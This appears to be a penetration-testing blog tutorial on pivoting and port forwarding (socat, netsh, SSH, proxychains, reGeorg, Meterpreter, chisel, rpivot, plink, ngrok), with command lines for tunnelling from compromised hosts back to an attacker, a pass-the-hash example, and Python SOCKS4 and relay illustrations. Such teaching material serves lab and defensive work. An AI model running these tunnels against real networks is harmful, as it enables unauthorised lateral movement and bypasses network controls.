Pivoting & Port forwarding methods – part2
This post covers port-forwarding techniques. The methods walked through below are:
- socat
- Windows netsh
- SSH
- proxychains
- Web SOCKS (reGeorg)
- Metasploit
- sshuttle
- chisel
- rpivot
- plink
- ngrok
SOCAT
To install socat, we simply run:
sudo apt-get update
sudo apt-get install socat
To have your internet-facing node (112.72.6.1) accept connections on port 808 and relay them to the remote node 62.41.90.2 on port 443, run:
socat TCP4-LISTEN:808,fork TCP4:62.41.90.2:443
fork makes socat spawn a child for every accepted connection, so several clients can use the relay at once. Without a bind= option the listener accepts on every IPv4 address the node has, not only 112.72.6.1.
To relay port 9090 to 62.41.90.2:22 and port 81 to ftp.microsoft.com:21, start one socat per forward and background each of them; do not pipe one socat into the other, since the relays never touch stdin or stdout:
socat TCP4-LISTEN:9090,fork TCP4:62.41.90.2:22 &
socat TCP4-LISTEN:81,fork TCP4:ftp.microsoft.com:21 &
Windows Netsh Port Forwarding
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
Example: accept on 10.1.1.110:3340 and forward to RDP on the same host:
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
- listenaddress – local IP address on which the proxy waits for a connection.
- listenport – local TCP port on which the proxy listens.
- connectaddress – local or remote IP address (or DNS name) to which the incoming connection is redirected.
- connectport – TCP port to which the connection from listenport is forwarded.
portproxy needs an elevated prompt and the IP Helper service (iphlpsvc) running, and Windows Firewall must allow inbound traffic to listenport. Rules persist across reboots: list them with netsh interface portproxy show all and remove one with netsh interface portproxy delete v4tov4 listenport=3340 listenaddress=10.1.1.110 when you are done, so you do not leave a forward behind on the host.
SSH
SOCKS Proxy
ssh -D 8080 [user]@[host]
ssh -N -f -D 9000 [user]@[host]
-f : put ssh in the background once authentication is done
-N : do not execute a remote command, only forward
-D opens a SOCKS (4 and 5) listener on the client. By default it binds to 127.0.0.1; use -D 0.0.0.0:9000 (or the -g flag) if other hosts must reach it.
Cool Tip: the SSH escape sequence lets you add forwards to a session that is already open. Press [ENTER] then ~C to get the ssh> prompt and type:
-D 1090
OpenSSH clients from 9.2 onwards disable this command line unless EnableEscapeCommandline yes is set in ssh_config.
Local Port Forwarding
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
Connections to [bindaddr]:[port] on your machine are carried over the SSH session and opened by [host] towards [dsthost]:[dstport], so [dsthost] only has to be reachable from [host].
Remote Port Forwarding
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
ssh -R 3389:10.1.1.224:3389 [email protected]
The SSH server listens on [port] and sends each connection back through the tunnel to [localhost]:[localport] as seen from your machine; the second command exposes RDP on 10.1.1.224 via the SSH server. The remote listener binds to loopback only unless sshd has GatewayPorts yes (or clientspecified) and you supply a [bindaddr].
proxychains
Config file: /etc/proxychains.conf (proxychains-ng reads /etc/proxychains4.conf)
[ProxyList]
socks4 localhost 8080
Point the SOCKS4 entry at your ssh -D listener, then prefix the tool you want tunnelled:
proxychains nmap -sT 192.168.5.6
proxychains only hooks TCP connect(), so give nmap -sT (full connect scans) and -Pn; SYN scans, UDP and ICMP pings bypass the proxy. Enable proxy_dns in the config if hostnames must be resolved through the tunnel rather than by your local resolver.
Web SOCKS – reGeorg
reGeorg, the successor to reDuh, turns a compromised bastion web server into a SOCKS proxy into the DMZ. Pivot and pwn.
Drop the file that matches the server's runtime (ASP.NET, Node, JSP, PHP, Tomcat 5) on the server:
- tunnel.ashx
- tunnel.aspx
- tunnel.js
- tunnel.jsp
- tunnel.nosocket.php
- tunnel.php
- tunnel.tomcat.5.jsp
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
# the SOCKS proxy will listen on port 8080
optional arguments:
-h, --help          show this help message and exit
-l, --listen-on     the default listening address
-p, --listen-port   the default listening port
-r, --read-buff     local read buffer, max data to be sent per POST
-u, --url           the url containing the tunnel script
-v, --verbose       verbose output [INFO|DEBUG]
Metasploit
# Meterpreter: list active port forwards
portfwd list
# Forward local port 3389 (RDP) through the session to target-host:3389
portfwd add -l 3389 -p 3389 -r target-host
# Forward local port 88 to port 88 on the compromised host itself
portfwd add -l 88 -p 88 -r 127.0.0.1
# Bind the local listener on all interfaces (-L) so other hosts can use it
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
# Remove a single forward
portfwd delete -l 3389 -p 3389 -r target-host
# Remove all port forwards
portfwd flush
or route a whole subnet through the session and expose it as a SOCKS proxy:
# Meterpreter: use the autoroute script to add a route for 192.168.15.0/24
run autoroute -s 192.168.15.0/24
# Meterpreter: list all active routes
run autoroute -p
# msfconsole: start a SOCKS server that uses those routes
use auxiliary/server/socks4a
(recent Metasploit versions merged this into auxiliary/server/socks_proxy; set VERSION to 4a or 5 there)
# msfconsole: view the routes and the session that carries each one
route
# msfconsole: add a route for 192.168.14.0/24 via session 3
route add 192.168.14.0 255.255.255.0 3
# msfconsole: delete that route
route delete 192.168.14.0 255.255.255.0 3
# msfconsole: delete all routes
route flush
sshuttle
A transparent proxy that works as a poor man's VPN: it forwards traffic over ssh.
- Doesn't require admin on the remote side (just an SSH login with Python available there); the local side needs root to install the firewall redirect rules.
- Works with Linux and macOS clients.
- Supports DNS tunnelling (--dns).
pacman -Sy sshuttle
apt-get install sshuttle
# -r is the remote host, -vv is verbose; the subnet given is what gets routed through the tunnel
sshuttle -vvr [email protected] 10.1.1.0/24
sshuttle -vvr [email protected]_host 10.2.2.0/24
chisel
go get -v github.com/jpillora/chisel
(current Go toolchains use go install github.com/jpillora/chisel@latest; prebuilt binaries are on the project's releases page)
# on the attacker box: start the server first, allowing reverse tunnels
/opt/chisel/chisel server -p 8008 --reverse
# on the compromised host: expose its ports 88 and 389 on the attacker's 127.0.0.1:88 and :389
.\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389
Add R:socks to the client command to get a SOCKS5 listener on the server side (port 1080 by default) that proxychains can use.
Rpivot
Server (attacker box): listens on 9443 for the client and exposes a SOCKS4 proxy on 1080
python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
Client (compromised box): connects back to the server; connections made to the attacker's port 1080 then exit from this host
python client.py --server-ip <ip> --server-port 9443
Through a corporate NTLM proxy
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] --ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
Passing the hash (LM:NT)
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] --ntlm-proxy-port 8080 --domain CORP --username jdoe --hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
plink
# exposes the SMB port (445) of this machine on port 445 of the SSH server
plink -l root -pw toor -R 445:127.0.0.1:445 ssh-server-ip
# exposes the RDP port of this machine on port 3390 of the SSH server
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389
plink -l root -pw mypassword 192.168.18.84 -R
# local forward: connections to 127.0.0.1:6666 on this machine reach port 445 on the SSH server's loopback
plink.exe -v -pw mypassword [email protected] -L 6666:127.0.0.1:445
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
# redirects the Windows port 445 to Kali on port 445 (-P 22 is Kali's SSH port, -C enables compression)
plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185
On a first connection plink asks whether to trust the server's host key, which hangs a non-interactive shell; pipe in the answer (echo y | plink ...) or pin the key with -hostkey. As with ssh, -R listeners bind to loopback on the SSH server unless sshd has GatewayPorts yes.
ngrok
# get the binary (legacy v2 download link; current releases are at https://ngrok.com/download)
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
# log into the service with your account token (ngrok v3 uses: ngrok config add-authtoken <token>)
./ngrok authtoken 3U[REDACTED_TOKEN]Hm
# expose local port 4433 on a public ngrok endpoint, as HTTP or as raw TCP
./ngrok http 4433
./ngrok tcp 4433
Everything through that endpoint transits ngrok's infrastructure, so treat it as a third party on the path.
For my time in the labs, I started out using single-hop local SSH forwards through a pivot point that I had owned in the remote network. This works just fine if you know that port 80 is open and all you want to do is connect to port 80 inside a network you don’t have direct access to. That looks something like:
ssh [email protected] -L 81:10.71.1.28:80
Later on, I learned to do more dynamic SSH forwards with proxychains:
PROXYCHAINS
I used a dynamic ssh tunnel via John:
ssh -f -N -D 127.0.0.1:9050 [email protected] -p 22000
Tested with:
proxychains nmap 10.2.2.15 -sT -Pn
ssh -f -N -D 127.0.0.1:9050 [email protected]
leafpad /etc/proxychains.conf
proxychains ssh -f -N -D 127.0.0.1:9055 [email protected] -p 222
leafpad /etc/proxychains.conf
proxychains ssh [email protected]
And even later, I did double pivoting using proxychains:
ssh -tt -L8080:localhost:8157 [email protected] ssh -t -D 8157 [email protected] -p 222
(the outer ssh reaches the first hop and local-forwards 8080 to that hop's port 8157; the command it runs there is a second ssh to the next hop with a SOCKS listener on 8157, so 127.0.0.1:8080 on the attack box becomes a SOCKS proxy that exits from the second hop)
Set up proxychains to use the forwarded port 8080:
leafpad /etc/proxychains.conf
strict_chain or dynamic_chain
socks4 127.0.0.1 8080
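Whether the ProxyList entry is `socks4 localhost 8080` (in the proxychains section above) or `socks4 127.0.0.1 8080` here, proxychains ends up speaking the same SOCKS4 handshake to the listener behind `ssh -D`. The Python below is an added illustration, not code from this page, proxychains or OpenSSH: it builds the SOCKS4 CONNECT request (and the SOCKS4a form that `proxy_dns` depends on), decodes it the way the proxy side does, parses the 8-byte reply, and wraps the handshake in a connect helper. Function names, the `dc01.corp.local` hostname and the other sample targets are assumptions made for the demo.

```python
"""SOCKS4 / SOCKS4a on the wire: what proxychains sends to the listener behind
`ssh -D`, chisel, rpivot or Metasploit's SOCKS module, and what that listener
decodes. Added illustration, not the proxychains or OpenSSH code; function
names and the sample targets are assumptions."""
import ipaddress
import socket
import struct

SOCKS4_VERSION = 4
CMD_CONNECT = 1          # CMD_BIND (2) is rarely used by pivoting tools
_STATUS = {90: "request granted", 91: "request rejected or failed",
           92: "identd not reachable", 93: "identd user mismatch"}


def build_connect(target: str, port: int, userid: str = "") -> bytes:
    """Build a SOCKS4 CONNECT: VN=4 CD=1 DSTPORT DSTIP USERID NUL.

    If target is not an IPv4 literal, emit the SOCKS4a form instead: DSTIP is
    0.0.0.1 (an invalid address that flags the extension) and the hostname is
    appended after USERID, so the proxy resolves the name. That is what
    proxy_dns in proxychains.conf relies on; without it the client resolves the
    name locally, which leaks the lookup and fails for internal names."""
    header = struct.pack("!BBH", SOCKS4_VERSION, CMD_CONNECT, port)
    try:
        dst_ip = ipaddress.IPv4Address(target).packed
    except ipaddress.AddressValueError:
        return header + b"\x00\x00\x00\x01" + userid.encode() + b"\x00" + target.encode() + b"\x00"
    return header + dst_ip + userid.encode() + b"\x00"


def parse_request(data: bytes):
    """Decode a SOCKS4/4a request the way the proxy side does.
    Returns (cmd, host, port, userid); host is dotted IPv4 or the 4a hostname."""
    if len(data) < 9 or data[0] != SOCKS4_VERSION:
        raise ValueError("not a SOCKS4 request")
    cmd, port = struct.unpack("!BH", data[1:4])
    dst_ip = data[4:8]
    userid, sep, tail = data[8:].partition(b"\x00")
    if not sep:
        raise ValueError("USERID not NUL-terminated")
    if dst_ip[:3] == b"\x00\x00\x00" and dst_ip[3] != 0:   # 0.0.0.x marks SOCKS4a
        host, sep, _ = tail.partition(b"\x00")
        if not sep:
            raise ValueError("SOCKS4a hostname not NUL-terminated")
        host = host.decode()
    else:
        host = str(ipaddress.IPv4Address(dst_ip))
    return cmd, host, port, userid.decode()


def parse_reply(data: bytes) -> dict:
    """Decode the 8-byte reply: VN=0, CD=90..93, then DSTPORT/DSTIP
    (the address part only carries information for BIND)."""
    if len(data) != 8 or data[0] != 0:
        raise ValueError("malformed SOCKS4 reply")
    code, port = struct.unpack("!BH", data[1:4])
    return {"granted": code == 90, "code": code,
            "status": _STATUS.get(code, "unknown"),
            "bind_addr": (str(ipaddress.IPv4Address(data[4:8])), port)}


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection during the handshake")
        buf += chunk
    return buf


def socks4_connect(proxy: tuple, target: str, port: int, userid: str = "") -> socket.socket:
    """Open target:port through a SOCKS4(a) proxy such as `ssh -D 8080` and
    return the tunnelled socket: the handshake proxychains performs inside
    its hooked connect()."""
    s = socket.create_connection(proxy)
    try:
        s.sendall(build_connect(target, port, userid))
        reply = parse_reply(_recv_exact(s, 8))
        if not reply["granted"]:
            raise ConnectionError(f"SOCKS4 reply {reply['code']}: {reply['status']}")
    except Exception:
        s.close()
        raise
    return s
```

`socks4_connect(("127.0.0.1", 8080), "10.2.2.15", 22)` gives you a socket that behaves as if it were connected to 10.2.2.15:22 from the SSH server, which is all proxychains does for every connect() the wrapped program makes. The 4a branch is worth remembering when a scan through proxychains "cannot resolve" internal names: the fix is `proxy_dns`, not a different proxy.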
Basic Pivoting Types
| Type | Use Case |
|---|---|
| Listen – Listen | Exposed asset, may not want to connect out. |
| Listen – Connect | Normal redirect. |
| Connect – Connect | Can't bind, so connect to bridge two hosts. |
The tables below use localhost for everything so they can be tried on one box; on a real pivot replace localhost with the hosts involved. With the two-listener variants the second listener is only opened after the first connection has arrived, so remote host 1 must connect before remote host 2.
Listen – Listen
| Where | Command |
|---|---|
| pivot (ncat) | ncat -v -l -p 8080 -c "ncat -v -l -p 9090" |
| pivot (socat) | socat -v tcp-listen:8080 tcp-listen:9090 |
| remote host 1 | ncat localhost 8080 < file |
| remote host 2 | ncat localhost 9090 > newfile |
Listen – Connect
| Where | Command |
|---|---|
| pivot (ncat) | ncat -l -v -p 8080 -c "ncat localhost 9090" |
| pivot (socat) | socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090 |
| remote host 1 | ncat localhost 8080 < file |
| remote host 2 | ncat -l -p 9090 > newfile |
Connect – Connect
| Where | Command |
|---|---|
| pivot (ncat) | ncat localhost 8080 -c "ncat localhost 9090" |
| pivot (socat) | socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090 |
| remote host 1 | ncat -l -p 8080 < file |
| remote host 2 | ncat -l -p 9090 > newfile |
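The three bridge types in the tables above, and the socat, netsh and portfwd forwards earlier in the post, are one and the same operation: obtain two connected sockets and copy bytes between them in both directions until each side closes. The Python below is an added illustration (not code from the page, socat or ncat) that builds that relay and then runs each of the three pivot types on loopback against a constructed echo service; the endpoint tuple format, function names and demo payloads are assumptions made for the example.

```python
"""TCP pivot building blocks in pure Python: one bidirectional relay and the
three endpoint combinations from the table above. Added illustration only,
not code from the page, socat or ncat; names and the echo server are
constructed for the demo."""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy src -> dst until EOF, then half-close dst so the far end sees EOF."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay(a: socket.socket, b: socket.socket) -> None:
    """Full-duplex relay: what socat, `ncat -c` and netsh portproxy do per connection."""
    t = threading.Thread(target=_pump, args=(a, b), daemon=True)
    t.start()
    _pump(b, a)
    t.join()
    a.close()
    b.close()


def prepare(endpoint):
    """Map ("listen", host, port) / ("connect", host, port) to (addr, finish).
    Listeners are bound now (port 0 = any free port) so addr is known before a
    peer shows up; finish() blocks until the socket is actually connected."""
    kind, host, port = endpoint
    if kind == "listen":
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)

        def accept_one():
            conn, _ = srv.accept()
            srv.close()
            return conn

        return srv.getsockname(), accept_one
    if kind == "connect":
        return (host, port), lambda: socket.create_connection((host, port))
    raise ValueError(f"unknown endpoint kind {kind!r}")


def start_bridge(left, right):
    """Listen-Listen, Listen-Connect or Connect-Connect, chosen only by the endpoint
    kinds. Handles one connection pair, like socat without `fork`.
    Returns (thread, (left_addr, right_addr))."""
    left_addr, finish_left = prepare(left)
    right_addr, finish_right = prepare(right)
    t = threading.Thread(target=lambda: relay(finish_left(), finish_right()), daemon=True)
    t.start()
    return t, (left_addr, right_addr)


def start_echo_server():
    """Constructed stand-in for the service behind the pivot (serves one client)."""
    addr, accept = prepare(("listen", "127.0.0.1", 0))

    def handle():
        with accept() as conn:
            while data := conn.recv(4096):
                conn.sendall(data)

    threading.Thread(target=handle, daemon=True).start()
    return addr


def recv_all(sock: socket.socket) -> bytes:
    """Read until EOF, which the relay propagates as a half-close."""
    chunks = []
    while data := sock.recv(4096):
        chunks.append(data)
    return b"".join(chunks)


def demo_listen_connect() -> bytes:
    """Listen-Connect (normal redirect): client -> pivot -> echo service."""
    echo = start_echo_server()
    _, (front, _) = start_bridge(("listen", "127.0.0.1", 0), ("connect", *echo))
    with socket.create_connection(front) as c:
        c.sendall(b"hello via pivot")
        c.shutdown(socket.SHUT_WR)
        return recv_all(c)


def demo_listen_listen() -> bytes:
    """Listen-Listen: both remote hosts dial in; the pivot joins the two."""
    _, (p1, p2) = start_bridge(("listen", "127.0.0.1", 0), ("listen", "127.0.0.1", 0))
    with socket.create_connection(p1) as h1, socket.create_connection(p2) as h2:
        h1.sendall(b"file contents")
        h1.shutdown(socket.SHUT_WR)
        return recv_all(h2)


def demo_connect_connect() -> bytes:
    """Connect-Connect: the pivot cannot bind, so it dials both listening hosts."""
    a1, accept1 = prepare(("listen", "127.0.0.1", 0))  # stand-ins for the remote listeners
    a2, accept2 = prepare(("listen", "127.0.0.1", 0))
    start_bridge(("connect", *a1), ("connect", *a2))
    with accept1() as h1, accept2() as h2:
        h1.sendall(b"file contents")
        h1.shutdown(socket.SHUT_WR)
        return recv_all(h2)
```

Each demo returns the bytes that came out the far side, so `demo_listen_connect()` yields `b"hello via pivot"` and the other two yield `b"file contents"`. `start_bridge` deliberately serves a single connection pair, which is exactly socat without `fork` and ncat without `-k`; a relay meant to stay up wraps `accept` in a loop and starts one `relay` thread per client, and the half-close in `_pump` is what lets a file transfer through the pivot terminate cleanly instead of hanging on an open socket.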